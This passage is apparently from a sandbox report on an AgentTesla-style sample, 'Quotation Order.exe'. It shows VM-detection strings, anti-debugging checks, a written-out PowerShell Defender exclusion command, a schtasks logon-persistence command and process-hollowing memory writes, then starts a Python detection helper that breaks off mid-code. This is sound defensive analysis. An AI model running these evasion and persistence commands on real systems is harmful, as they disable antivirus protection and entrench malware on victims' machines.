                    Source: svchost.exe, 00000024.00000002.2516165987.000002B804ED4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: svchost.exe, 00000005.00000002.2514862826.00000202B728E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.35.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.35.drBinary or memory string: vmci.sys
                    Source: svchost.exe, 00000005.00000002.2513844364.00000202B724E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: CasPol.exe, 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREHS
                    Source: Amcache.hve.35.drBinary or memory string: VMware20,1
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
                    Source: Amcache.hve.35.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.35.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.35.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.35.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.35.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.35.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: AddInProcess32.exe, 0000001A.00000002.1513494565.0000000005FA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.35.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.35.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.35.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
                    Source: svchost.exe, 00000024.00000002.2514904148.000002B804E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
                    Source: svchost.exe, 00000005.00000002.2513550566.00000202B722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: CasPol.exe, 00000038.00000002.2543008151.0000000006260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                    Source: Amcache.hve.35.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.35.drBinary or memory string: VMware Virtual USB Mouse
                    Source: svchost.exe, 00000005.00000002.2514331338.00000202B7264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
                    Source: Amcache.hve.35.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.35.drBinary or memory string: VMware, Inc.
                    Source: svchost.exe, 00000005.00000002.2514513323.00000202B7281000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.35.drBinary or memory string: VMware20,1hbin@
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
                    Source: Amcache.hve.35.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.35.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.35.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: Amcache.hve.35.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.35.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
                    Source: CasPol.exe, 0000001F.00000002.1647286453.0000000005EB2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2543086036.0000000006090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
                    Source: svchost.exe, 00000011.00000002.1472279913.000001FCA7B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.35.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.35.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: svchost.exe, 00000005.00000002.2513550566.00000202B722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.35.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: svchost.exe, 00000024.00000003.1399478264.000002B805C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                    Source: Amcache.hve.35.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                    Source: AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: svchost.exe, 00000005.00000002.2512648304.00000202B7202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: Amcache.hve.35.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: svchost.exe, 00000005.00000002.2513844364.00000202B724E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 26_2_011E70C8 CheckRemoteDebuggerPresent,26_2_011E70C8
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Quotation Order.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Quotation Order.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Quotation Order.exe, -----.cs | Reference to suspicious API methods: ((_065E)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0605_FDE4_FDEC_065C_FDE8_060A_06E8_FDE0)), _FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0616_0619)), typeof(_065E)))("vpGUntmDH2Bs", out var _)
Source: Quotation Order.exe, -----.cs | Reference to suspicious API methods: ((_065E)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0605_FDE4_FDEC_065C_FDE8_060A_06E8_FDE0)), _FBCD_0670_FBC2_0600_FBD0(_FBBD_FBBF._0616_0619)), typeof(_065E)))("vpGUntmDH2Bs", out var _)
Source: Quotation Order.exe, -----.cs | Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _FBC8_061A_FBCA_06E2)
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, uRcQkDeJoO4.cs | Reference to suspicious API methods: zHSk.OpenProcess(C6Nh1Wz8.DuplicateHandle, bInheritHandle: true, (uint)_4aIajlwkXEt2.ProcessID)
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AA4008
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 820008
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: CDE008
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C83008
Source: C:\Users\user\Desktop\Quotation Order.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Users\user\Desktop\Quotation Order.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
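The process-creation and memory-write lines above carry the whole AgentTesla loader chain: a dropped svchost.exe under AppData\Roaming, an onlogon scheduled task at highest run level pointing at it, a Defender path exclusion via Add-MpPreference, argument-less launches of .NET Framework utilities (InstallUtil, RegAsm, RegSvcs, AddInProcess32, CasPol), and then an MZ header written at 0x400000 of AddInProcess32.exe and CasPol.exe followed by further section writes, which is the image-copy phase of process hollowing. The triage helper below is an added example, not code from the Joe Sandbox report or its vendor: it parses lines in exactly the shape shown (including the fused "svchost.exeProcess created:" form and the trailing "Jump to behavior" link text) and emits one finding per indicator. The indicator names, the host-binary list, the system-name list and the "MZ at 0x400000 plus at least two further writes" threshold are the example's own assumptions; the SAMPLE text is constructed from the report's lines.

```python
"""Triage helper for Joe Sandbox behaviour lines (added example, not report code)."""
import re
from collections import defaultdict

# Line shape as extracted above: the path may run straight into the event name
# ("...svchost.exeProcess created:") and may carry a trailing "Jump to behavior".
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?\.exe)\s*"
    r"(?P<kind>Process created|Memory written|Queries volume information):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)
MEMWRITE_RE = re.compile(
    r"^(?P<target>.+?\.exe)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
    r"(?:\s+value starts with:\s*(?P<prefix>[0-9A-Fa-f]+))?$"
)
# Assumed lists: .NET Framework utilities the report shows spawned with no
# arguments and then written to, and system binary names that belong only
# under the system directories.
DOTNET_HOSTS = {"installutil.exe", "regasm.exe", "regsvcs.exe",
                "addinprocess32.exe", "caspol.exe"}
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(text):
    """Return (source, kind, detail) for every line the regex understands."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m["source"].strip(), m["kind"].lower(), m["detail"].strip()))
    return events


def split_created(detail):
    """'<image> "<image>" args' -> (image, args); the image ends at the first '.exe'."""
    idx = detail.lower().find(".exe")
    if idx < 0:                                   # e.g. "unknown unknown"
        return detail, ""
    image, rest = detail[:idx + 4], detail[idx + 4:].strip()
    m = re.match(r'^"[^"]*"\s*(?P<args>.*)$', rest)
    return image, (m["args"] if m else rest).strip()


def check_process(source, detail):
    out, low = [], detail.lower()
    if basename(source) in SYSTEM_NAMES and not source.lower().startswith(SYSTEM_DIRS):
        out.append(("masquerading", source,
                    f"{basename(source)} running from outside the system directories"))
    if "add-mppreference" in low and "-exclusionpath" in low:
        out.append(("defender_exclusion", source, detail))
    if "schtasks" in low and "/create" in low:
        tags = [flag for flag in ("/sc onlogon", "/rl highest") if flag in low]
        if "\\appdata\\" in low:
            tags.append("task target under AppData")
        out.append(("persistence_schtasks", source, "; ".join(tags)))
    image, args = split_created(detail)
    if basename(image) in DOTNET_HOSTS and not args:
        out.append(("dotnet_host_spawned", source,
                    f"{basename(image)} launched with no arguments"))
    return out


def analyse(text):
    findings, writes = [], defaultdict(list)      # (source, target) -> [(base, prefix)]
    for source, kind, detail in parse(text):
        if kind == "process created":
            findings.extend(check_process(source, detail))
        elif kind == "memory written":
            m = MEMWRITE_RE.match(detail)
            if m:
                writes[(source, m["target"])].append(
                    (int(m["base"], 16), (m["prefix"] or "").upper()))
    for (source, target), ws in writes.items():
        # An MZ buffer at the default image base of a just-spawned host, followed
        # by writes at other addresses, is the image/section copy phase of hollowing.
        mz_at_base = any(b == 0x400000 and p.startswith("4D5A") for b, p in ws)
        others = {b for b, _ in ws if b != 0x400000}
        if mz_at_base and len(others) >= 2:
            findings.append(("process_hollowing", source,
                             f"{basename(target)}: MZ header written at 0x400000 "
                             f"plus {len(others)} further writes"))
    return list(dict.fromkeys(findings))          # keep order, drop repeated events


# Constructed sample, copied in shape from the report lines (raw string so the
# Windows paths survive). The last line is a benign negative case.
SAMPLE = r"""
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
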